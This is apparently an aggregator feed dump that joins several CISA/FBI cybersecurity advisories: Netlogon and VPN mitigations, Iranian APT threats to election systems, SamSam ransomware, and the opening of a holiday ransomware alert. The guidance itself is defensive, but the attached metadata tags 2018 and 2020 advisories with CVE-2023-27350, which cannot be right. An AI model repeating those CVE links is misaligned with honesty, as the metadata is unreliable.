 * **Update all Domain Controllers and Read Only Domain Controllers.** On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation for this vulnerability (aside from removing affected domain controllers from the network).
 * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.
 * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).

To protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:

 * Update your domain controllers with an update released August 11, 2020, or later.
 * Find which devices are making vulnerable connections by monitoring event logs.
 * Address non-compliant devices making vulnerable connections.
 * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.

### VPN Vulnerabilities

Implement the following recommendations to secure your organization’s VPNs:

 * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.
 * **Implement multi-factor authentication (MFA) on all VPN connections to increase security.** Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords.
   See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.

Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:

 * **Audit** configuration and patch management programs.
 * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).
 * **Implement** MFA, especially for privileged accounts.
 * **Use** separate administrative accounts on separate administration workstations.
 * **Keep** [software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available.

### How to uncover and mitigate malicious activity

 * **Collect and remove** for further analysis:
   * Relevant artifacts, logs, and data.
 * **Implement** mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.
 * **Consider** soliciting incident response support from a third-party IT security organization to:
   * Provide subject matter expertise and technical support to the incident response.
   * Ensure that the actor is eradicated from the network.
   * Avoid residual issues that could result in follow-up compromises once the incident is closed.

### Resources

 * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)
 * CISA Infographic: [Risk and Vulnerability Assessment (RVA) Mapped to the MITRE ATT&CK Framework](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)
 * National Security Agency InfoSheet: [Configuring IPsec Virtual Private Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)
 * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)
 * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)
 * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)
 * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)
 * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)

### Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.

For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

 * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or
 * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)

**_DISCLAIMER_**

_This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._

_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._

### References

[[1] Fortinet Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>)

[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)

[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)

[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)

### Revisions

October 9, 2020: Initial Version | October 11, 2020: Updated Summary | October 12, 2020: Added Additional Links

Record metadata (from the aggregator entry for this advisory):

 * id: AA20-283A
 * title: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
 * type: ics; bulletinFamily: info
 * published: 2020-10-24T12:00:00; modified: 2020-10-24T12:00:00
 * href: <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a>
 * cvelist: CVE-2018-13379, CVE-2019-11510, CVE-2019-19781, CVE-2020-1472, CVE-2020-15505, CVE-2020-1631, CVE-2020-2021, CVE-2020-5902, CVE-2023-27350
 * cvss3: base score 10.0, CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; exploitability 3.9, impact 6.0)
 * cvss2: base score 10.0, HIGH (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability 10.0, impact 10.0)

Next record (lastseen: 2023-05-31T15:30:52):

### Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.

The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.

The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.
### Technical Details

These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs), notably [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) and [CVE-2017-9248](<https://nvd.nist.gov/vuln/detail/CVE-2017-9248>), pertaining to virtual private networks (VPNs) and content management systems (CMSs).

 * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code.[[1](<https://support.f5.com/csp/article/K52145254>)]
 * [CVE-2017-9248](<https://nvd.nist.gov/vuln/detail/CVE-2017-9248>) affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[[2](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>)]

Historically, these actors have conducted DDoS attacks, SQL injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.

 * **A DDoS attack** could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.
 * **A SQL injection** involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could give a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.
 * **Spear-phishing messages** may not be easily detectable. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information (often credentials, such as passwords) and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.
 * **Public-facing website defacements** typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised.
 * **Disinformation campaigns** involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories and, in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.

### Mitigations

The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:

 * Validate input: input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws in web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.
 * Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
 * Verify that all cloud-based virtual machine instances with a public IP do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.
 * Enable strong password requirements and account lockout policies to defend against brute-force attacks.
 * Apply multi-factor authentication, when possible.
 * Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248.
   * For patch information on CVE-2020-5902, refer to F5 Security Advisory [K52145254](<https://support.f5.com/csp/article/K52145254>).
   * For patch information on CVE-2017-9248, refer to [Progress Telerik details for CVE-2017-9248](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>).
 * Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.
 * Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.
 * When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.
 * Ensure third parties that require RDP access are required to follow internal policies on remote access.
 * Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.
 * Regulate and limit external to internal RDP connections.
When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.\n * Be aware of unsolicited contact on social media from any individual you do not know.\n * Be aware of attempts to pass links or files via social media from anyone you do not know.\n * Be aware of unsolicited requests to share a file via online services.\n * Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.\n * Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).\n * Be suspicious of unsolicited email messages that contain shortened links (e.g., via `tinyurl`, `bit.ly`).\n * Use security features provided by social media platforms, use [strong passwords](<https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords>), change passwords frequently, and use a different password for each social media account.\n * See CISA\u2019s [Tip on Best Practices for Securing Election Systems](<https://us-cert.cisa.gov/ncas/tips/ST19-002>) for more information.\n\n#### General Mitigations\n\n##### Keep applications and systems updated and patched\n\nApply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These \u201cN-day\u201d exploits can be as damaging as a zero-day exploits. 
Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender\u2019s patch cycle.[[3](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1>)] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[[4](<https://owasp.org/www-project-dependency-check/>)]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.\n\n##### Scan web applications for SQL injection and other common web vulnerabilities\n\nImplement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[[5](<https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm>)] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.\n\n##### Deploy a web application firewall \n\nDeploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. 
WAFs also weaken the effectiveness of automated web vulnerability scanning tools.\n\n##### Deploy techniques to protect against web shells\n\nPatch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[[6](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)] Malicious cyber actors often deploy web shells\u2014software that can enable remote administration\u2014on a victim\u2019s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.\n\n##### Use multi-factor authentication for administrator accounts\n\nPrioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[[7](<https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs>)] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[[8](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf>)] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.\n\n##### Remediate critical web application security risks\n\nFirst, identify and remedite critical web application 
security risks first; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[[9](<https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm>)],[[10](<https://owasp.org/www-project-top-ten/>)],[[11](<https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html>)]\n\n##### How do I respond to unauthorized access to election-related systems?\n\n###### Implement your security incident response and business continuity plan\n\nIt may take time for your organization\u2019s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization\u2019s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.\n\n###### Contact CISA or law enforcement immediately\n\nTo report an intrusion and to request incident response resources or technical assistance, contact CISA ([Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI\u2019s Cyber Division ([CyWatch@ic.fbi.gov](<mailto:CyWatch@ic.fbi.gov>) or 855-292-3937).\n\n### Resources\n\n * [CISA Tip: Best Practices for Securing Election Systems](<https://us-cert.cisa.gov/ncas/tips/ST19-002>)\n * [CISA Tip: Securing Voter Registration Data](<https://us-cert.cisa.gov/ncas/tips/ST16-001>)\n * [CISA Tip: Website Security](<https://us-cert.cisa.gov/ncas/tips/ST18-006>)\n * [CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)\n * [CISA Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n * [CISA Activity Alert: Technical Approaches to Uncovering and Remediating Malicious 
Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * [CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities](<https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf>)\n * FBI and CISA Public Service Announcement (PSA): [Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters](<https://ic3.gov/Media/Y2020/PSA201002>)\n * FBI and CISA PSA: [Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections](<https://www.ic3.gov/Media/Y2020/PSA201001>)\n * FBI and CISA PSA: [Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting](<https://www.ic3.gov/Media/Y2020/PSA200930>)\n * FBI and CISA PSA: [False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections](<https://www.ic3.gov/Media/Y2020/PSA200928>)\n * FBI and CISA PSA: [Cyber Threats to Voting Processes Could Slow But Not Prevent Voting](<https://ic3.gov/Media/Y2020/PSA200924>)\n * FBI and CISA PSA: [Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results](<https://ic3.gov/Media/Y2020/PSA200922>)\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### References\n\n[[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\n\n[[2] Progress Telerik details for CVE-2017-9248](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>)\n\n[[3] NSA \"NSA'S Top Ten Cybersecurity Mitigation Strategies\"](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf>)\n\n[[4] OWASP Dependency-Check](<https://owasp.org/www-project-dependency-check/>)\n\n[[5] NSA \"Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network\"](<https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm>)\n\n[[6] NSA & ASD \"CyberSecurity Information: Detect and Prevent Web Shell Malware\"](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)\n\n[[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs](<https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs>)\n\n[[8] NSA \"NSA'S Top Ten Cybersecurity Mitigation Strategies\"](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf>)\n\n[[9] NSA \u201cBuilding Web Applications \u2013 Security for Developers\u201d](<https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm>)\n\n[[10] OWASP Top Ten](<https://owasp.org/www-project-top-ten/>)\n\n[[11] 2020 CWE Top 25 Most Dangerous Software 
Weaknesses](<https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-22T12:00:00", "type": "ics", "title": "Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-10-22T12:00:00", "id": "AA20-296B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T15:38:41", "description": "### Summary\n\nThe Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform computer network defenders about SamSam ransomware, also known as MSIL/Samas.A. Specifically, this product shares analysis of vulnerabilities that cyber actors exploited to deploy this ransomware. 
In addition, this report provides recommendations for prevention and mitigation.\n\nThe SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally. Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.\n\nThe actors exploit Windows servers to gain persistent access to a victim\u2019s network and infect all reachable hosts. According to reporting from victims in early 2016, cyber actors used the JexBoss Exploit Kit to access vulnerable JBoss applications. Since mid-2016, FBI analysis of victims\u2019 machines indicates that cyber actors use Remote Desktop Protocol (RDP) to gain persistent access to victims\u2019 networks. Typically, actors either use brute force attacks or stolen login credentials. Detecting RDP intrusions can be challenging because the malware enters through an approved access point.\n\nAfter gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims\u2019 action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.\n\nAnalysis of tools found on victims\u2019 networks indicated that successful cyber actors purchased several of the stolen RDP credentials from known darknet marketplaces. FBI analysis of victims\u2019 access logs revealed that the SamSam actors can infect a network within hours of purchasing the credentials. While remediating infected systems, several victims found suspicious activity on their networks unrelated to SamSam. 
This activity is a possible indicator that the victims\u2019 credentials were stolen, sold on the darknet, and used for other illegal activity.\n\nSamSam actors leave ransom notes on encrypted computers. These instructions direct victims to establish contact through a Tor hidden service site. After paying the ransom in Bitcoin and establishing contact, victims usually receive links to download cryptographic keys and tools to decrypt their network.\n\n### Technical Details\n\nNCCIC recommends organizations review the following SamSam Malware Analysis Reports. The reports represent four SamSam malware variants. This is not an exhaustive list.\n\n * MAR-10219351.r1.v2 \u2013 SamSam1\n * MAR-10166283.r1.v1 \u2013 SamSam2\n * MAR-10158513.r1.v1 \u2013 SamSam3\n * MAR-10164494.r1.v1 \u2013 SamSam4\n\nFor general information on ransomware, see the NCCIC Security Publication at https://www.us-cert.gov/security-publications/Ransomware.\n\n### Mitigations\n\nDHS and FBI recommend that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes before implementation to avoid unwanted impacts.\n\n * Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.\n * Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. 
Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.\n * Enable strong passwords and account lockout policies to defend against brute force attacks.\n * Where possible, apply two-factor authentication.\n * Regularly apply system and software updates.\n * Maintain a good back-up strategy.\n * Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.\n * When creating cloud-based virtual machines, adhere to the cloud provider\u2019s best practices for remote access.\n * Ensure that third parties that require RDP access follow internal policies on remote access.\n * Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.\n * Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.\n * Restrict users' ability (permissions) to install and run unwanted software applications.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Disable file and printer sharing services. 
If these services are required, use strong passwords or Active Directory authentication.\n\nAdditional information on malware incident prevention and handling can be found in Special Publication 800-83, _Guide to Malware Incident Prevention and Handling for Desktops and Laptops_, from the National Institute of Standards and Technology.[[1]](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Contact Information\n\nTo report an intrusion and request resources for incident response or technical assistance, contact NCCIC, FBI, or the FBI\u2019s Cyber Division via the following information:\n\n * NCCIC \n * [NCCICCustomerService@hq.dhs.gov](<mailto:NCCICCustomerService@hq.dhs.gov>)\n * 888-282-0870\n * FBI\u2019s Cyber Division \n * [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)\n * 855-292-3937\n * FBI through a local field office\n\n### Feedback\n\nDHS strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. 
You can help by answering a few short questions about this report at the following URL: https://www.us-cert.gov/forms/feedback.\n\n### References\n\n[[1] NIST SP 800-83: Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Revisions\n\nDecember 3, 2018: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-03T12:00:00", "type": "ics", "title": "SamSam Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2018-12-03T12:00:00", "id": "AA18-337A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa18-337a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:25:48", "description": "### Summary\n\n_**Immediate Actions You Can Take Now to Protect Against Ransomware** \n\u2022 Make an [offline backup ](<https://cisa.gov/sites/default/files/publications/Cyber Essentials Toolkit 5 20201015_508.pdf>)of your data. 
\n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n\u2022 If you use [RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 [Update](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) your OS and software. \n\u2022 Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>). \n\u2022 Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends\u2014when offices are normally closed\u2014in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information so that organizations are especially diligent in their network defense practices in the run-up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.\n\n### Threat Overview\n\n#### **Recent Holiday Targeting**\n\nCyber actors have conducted increasingly impactful attacks 